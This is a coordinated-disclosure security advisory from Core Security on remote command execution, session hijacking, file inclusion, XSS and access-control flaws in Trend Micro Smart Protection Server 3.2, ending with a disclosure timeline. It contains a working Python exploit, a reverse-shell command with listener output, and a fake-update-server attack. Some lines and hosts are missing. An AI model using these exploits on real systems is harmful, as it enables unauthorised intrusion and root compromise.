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Trend Micro Smart Protection Server 3.2 XSS / Access Control / Disclosure

🗓️ 22 Dec 2017 00:00:00Reported by Core Security TechnologiesType 

Trend Micro Smart Protection Server 3.2 multiple vulnerabilities including XSS, access control, and disclosure, allowing remote unauthenticated attackers to execute arbitrary commands with root privileges

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`1. *Advisory Information*  
Title: Trend Micro Smart Protection Server Multiple Vulnerabilities  
Advisory ID: CORE-2017-0008  
Advisory URL:  
Date published: 2017-12-19  
Date of last update: 2017-12-11  
Vendors contacted: Trend Micro  
Release mode: Coordinated release  
2. *Vulnerability Information*  
Class: Information Exposure Through Log Files [CWE-532], Improper  
Neutralization of Special Elements used in an OS Command [CWE-78],  
Improper Control of Filename for Include/Require Statement in PHP  
Program [CWE-98], Improper Neutralization of Input During Web Page  
Generation [CWE-79],Improper Authorization [CWE-285]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2017-11398, CVE-2017-14094, CVE-2017-14095,  
3. *Vulnerability Description*  
Trend Micro's website states that:  
Trend Micro Smart Protection Server [1] is a next-generation, in-the-cloud  
based, advanced protection solution. At the core of this solution is an  
advanced scanning architecture that leverages malware prevention  
signatures that are stored in-the-cloud. This solution leverages file  
reputation and Web reputation technology to detect security risks. The  
technology works by off loading a large number of malware prevention  
signatures and lists that were previously stored on endpoints to Trend  
Micro Smart Protection Server.  
Multiple vulnerabilities were found in the Smart Protection Server's  
Administration UI that would allow a remote unauthenticated attacker to  
execute arbitrary commands on the system.  
4. *Vulnerable Packages*  
. Trend Micro Smart Protection Server 3.2 (Build 1085)  
Other products and versions might be affected, but they were not tested.  
5. *Vendor Information, Solutions and Workarounds*  
Trend Micro published the following Notes:  
. SECURITY BULLETIN: Trend Micro Smart Protection Server (Standalone)  
Multiple Vulnerabilities[2]  
6. *Credits*  
These vulnerabilities were discovered and researched by Leandro Barragan  
and Maximiliano Vidal from Core Security Consulting Services. The  
publication of this advisory was coordinated by Alberto Solino from Core  
Advisories Team.  
7. *Technical Description / Proof of Concept Code*  
In section 7.1 we describe how an unauthenticated attacker could get a  
session token to perform authenticated requests against the application.  
Sections 7.2 and 7.3 describe two vectors to achieve remote command  
execution in the context of the Web application.  
Several public privilege escalation vulnerabilities exist that are still  
unpatched. In combination with the aforementioned vulnerabilities a  
remote unauthenticated attacker would be able to execute arbitrary  
system commands with root privileges.  
Sections 7.4 and 7.5 cover other common Web application vulnerabilities  
found in the product's console.  
7.1. *Session hijacking via log file disclosure*  
The application stores diagnostic logs in the  
/widget/repository/log/diagnostic.log file. Performing a login or some  
basic browsing will write several entries with the following format:  
2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null,<br />  
<b>Notice</b>: Undefined index: param in  
<b>/var/www/AdminUI/widget/inc/class/common/db/GenericDao.php</b> on  
line <b>218</b><br /><br />  
Each log entry leaks the associated session ID next to the log alert  
level and can be accessed via HTTP without authenticating to the Web  
Therefore, an unauthenticated attacker can grab this file and hijack  
active user sessions to perform authenticated requests.  
7.2. *Remote command execution via cron job injection*  
The script admin_update_program.php is responsible for creating a cron  
job when software updates are scheduled. The HTTP request contains  
several parameters that are used without sanitization as part of the  
cron job created at /var/spool/cron/webserv. We will target the  
hidTimingMin parameter.  
File /var/www/AdminUI/php/admin_update_program.php:  
if ( $arr_au['Program']['UseAUSchedule'] == "1"){  
if ( $arr_au['Program']['AUScheduleType'] == "0" ){  
$arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*");  
}else {  
$arr_au['Program']['AUScheduleTimingHour'], "*", "*",  
$crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program  
--Schedule > /dev/null 2>&1");  
if(! $crontab->addToCrontab()){  
header( 'Location:  
admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ;  
File /var/www/AdminUI/php/inc/crontab.php:  
function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL,  
$this->month=($month) ? $month : "*";  
$this->day=($day) ? $day : "*";  
$this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*";  
function saveCronFile(){  
$command=$this->minute." ".$this->hour." ".$this->day."  
".$this->month." ".$this->dayofweek." ".$this->command."\n";  
if(!fwrite($this->handle, $command))  
return true;  
return false;  
function addToCrontab(){  
exit('No name specified for cron file');  
return true;  
return false;  
The following python script creates a cron job that will run an  
arbitrary command on every minute. It also leverages the session  
hijacking vulnerability described in 7.1 to bypass the need of  
#!/usr/bin/env python  
import requests  
import sys  
def exploit(host, port, command):  
session_id = get_session_id(host, port)  
print "[+] Obtained session id %s" % session_id  
execute_command(session_id, host, port, command)  
def get_session_id(host, port):  
url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host,  
r = requests.get(url, verify=False)  
for line in r.text.split('\n')[::-1]:  
if "INFO" in line or "ERROR" in line:  
return line.split(',')[3]  
def execute_command(session_id, host, port, command):  
print "[+] Executing command '%s' on %s:%d" % (command, host, port)  
url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host,  
port, session_id)  
multipart_data = {  
"ComponentSchedule": "on",  
"ComponentScheduleOS": "on",  
"ComponentScheduleService": "on",  
"ComponentScheduleWidget": "on",  
"useAUSchedule": "on",  
"auschedule_setting": "1",  
"update_method": "1",  
"update_method3": "on",  
"userfile": "",  
"sid": session_id,  
"hidComponentScheduleOS": "1",  
"hidComponentScheduleService": "1",  
"hidComponentScheduleWidget": "1",  
"hidUseAUSchedule": "1",  
"hidScheduleType": "1",  
"hidTimingDay": "2",  
"hidTimingHour": "2",  
"hidTimingMin": "* * * * * %s #" % command,  
"hidUpdateOption": "1",  
"hidUpdateNowFlag": ""  
r =, data=multipart_data, cookies={session_id:  
session_id}, verify=False)  
print "[+] Cron job added, enjoy!"  
print "[-] Session has probably timed out, try again later!"  
if __name__ == "__main__":  
exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3])  
The following proof of concept opens a reverse shell to the attacker's  
$ python 4343 'bash -i >&  
/dev/tcp/ 0>&1'  
[+] Obtained session id q514un6ru6stcpf3k0n4putbd3  
[+] Executing command 'bash -i >& /dev/tcp/ 0>&1' on  
[+] Cron job added, enjoy!  
$ nc -lvp 8888  
Listening on [] (family 0, port 8888)  
Connection from [] port 8888 [tcp/*] accepted (family 2,  
sport 59508)  
bash: no job control in this shell  
[webserv@ localhost ~]$  
7.3. *Remote command execution via local file inclusion*  
The /widget/inc/widget_package_manager.php script passes user provided  
input to the PHP require_once function without sanitization. However,  
there are some restrictions that need to be overcome in order to include  
arbitrary files, as the application appends PoolManager.php at the end  
of the filename.  
File /var/www/AdminUI/widget/inc/widget_package_manager.php:  
case "check":  
// $strUpdateType = widget, configure_widget_and_widget_component  
$strUpdateType = isset($widgetRequest['update_type']) ?  
$widgetRequest['update_type'] : 'widget';  
$strFuncName =  
$isUpdate =  
public function getWidgetPoolManager($strUpdateType = 'widget'){  
if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){  
$strFileName =  
require_once (self::getDirnameFile() .  
$strClassName = 'WF'.$strFileName.'PoolManager';  
self::$instance[__FUNCTION__][$strUpdateType] = new  
return self::$instance[__FUNCTION__][$strUpdateType];  
One way for an attacker to place an arbitrary file on the system is to  
abuse the update process that can be managed from the same product  
Files downloaded from alternate update sources are stored in the  
/var/tmcss/activeupdate directory. An attacker can setup a fake update  
server and trigger an update from it to download the malicious archive.  
As an example, we have packed a reverse shell named  
rshellPoolManager.php into the archive. The following  
server.ini would instruct the application to download the archive and  
uncompress it inside /var/tmcss/activeupdate:  
; =======================================  
; ActiveUpdate 1.2 US  
; Filename: Server.ini  
; New Format AU 1.8  
; Last modified by AUJP1 10/14/2015  
; =======================================  
CertExpireDate=Jul 28 08:52:40 2019 GMT  
After triggering an update from the Web console, the PHP script is  
written to the expected location.  
[root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php  
-rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php  
The final step is to include the script and execute our payload.  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101  
Accept: application/json  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Request: JSON  
X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7  
Content-Type: application/json; charset=utf-8  
Content-Length: 122  
Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7  
Connection: close  
{"act": "check", "update_type":  
Steven Seeley and Roberto Suggi Liverani presented various privilege  
escalation vectors to move from webserv to root on their presentation "I  
Got 99 Trends and a # Is All Of Them". Based on our testing the attacks  
remain unpatched, so we did not try to find additional ways to escalate  
7.4. *Stored cross-site scripting*  
The ru parameter of the wcs_bwlists_handler.php script is vulnerable to  
cross-site scripting. This endpoint is used to manage user defined URLs.  
After the rule is inserted, the payload will be executed every time the  
user opens the user defined URLs section.  
The following proof of concept stores code to open an alert box.  
7.5. *Improper access control*  
The product console includes widgets that can be used to monitor other  
Credentials to access the servers being monitored, widget logs and other  
information reside on a SQLite database which can be accessed without  
authentication at the following URL:  
The credentials are stored using AES256 with a dynamic key. However, the  
key is also placed inside the Web server directories and available for  
download without authentication.  
This would allow an attacker to decrypt the contents of the database,  
rendering the encryption mechanism useless.  
8. *Report Timeline*  
. 2017-09-04:  
Core Security sent an initial notification to Trend Micro, including a  
draft advisory.  
. 2017-10-02:  
Core Security asked for an update on the vulnerability reported.  
. 2017-10-02:  
Trend Micro stated they are still in the process of creating the  
official fix for the vulnerabilities reported. ETA for the fix should be  
end of this month (October).  
. 2017-11-13:  
Core Security requested a status on the timeline for fixing the reported  
vulnerabilities since the original ETA was not accomplished.  
. 2017-11-14:  
Trend Micro stated they are still working on the Critical Patch and  
found problems along the way. Patch is now in QA.  
. 2017-11-20:  
Trend Micro informed availability for the fixes addressing 5 out of the  
6 vulnerabilities reported. They stated one of the reported  
vulnerabilities is on a table where the SQL query is allowed and 'does  
not cause anything leaking'.  
Still in the process of localizing the critical patches for other  
regions. Will let us know when everything is covered in order to set a  
disclosure date.  
. 2017-11-21:  
Core Security thanked the update and agreed on removing one of the  
reported vulnerabilities.  
. 2017-12-05:  
Trend Micro provided the CVE-ID for all the vulnerabilities reported and  
proposed the public disclosure date to be December 14th.  
. 2017-12-06:  
Core Security thanked the update and proposed public disclosure date to  
be Tuesday December 19th @ 12pm EST.  
. 2017-12-19:  
Advisory CORE-2017-0008 published.  
9. *References*  
10. *About CoreLabs*  
CoreLabs, the research center of Core Security, is charged with  
anticipating the future needs and requirements for information security  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. CoreLabs regularly publishes security  
advisories, technical papers, project information and shared software  
tools for public use at:  
11. *About Core Security*  
Core Security provides companies with the security insight  
they need to know who, how, and what is vulnerable in their  
organization. The company's threat-aware, identity & access,  
network security, and vulnerability management solutions  
provide actionable insight and context needed to manage  
security risks across the enterprise. This shared insight  
gives customers a comprehensive view of their security posture  
to make better security remediation decisions. Better insight  
allows organizations to prioritize their efforts to protect  
critical assets, take action sooner to mitigate access risk,  
and react faster if a breach does occur.  
Core Security is headquartered in the USA with offices and  
operations in South America, Europe, Middle East and Asia. To  
learn more, contact Core Security at (678) 304-4500 or  
[email protected]  
12. *Disclaimer*  
The contents of this advisory are copyright (c) 2017 Core Security and  
(c) 2017 CoreLabs, and are licensed under a Creative Commons  
Attribution Non-Commercial Share-Alike 3.0 (United States) License:  
13. *PGP/GPG Keys*  
This advisory has been signed with the GPG key of Core Security  
advisories team, which is available for download at  

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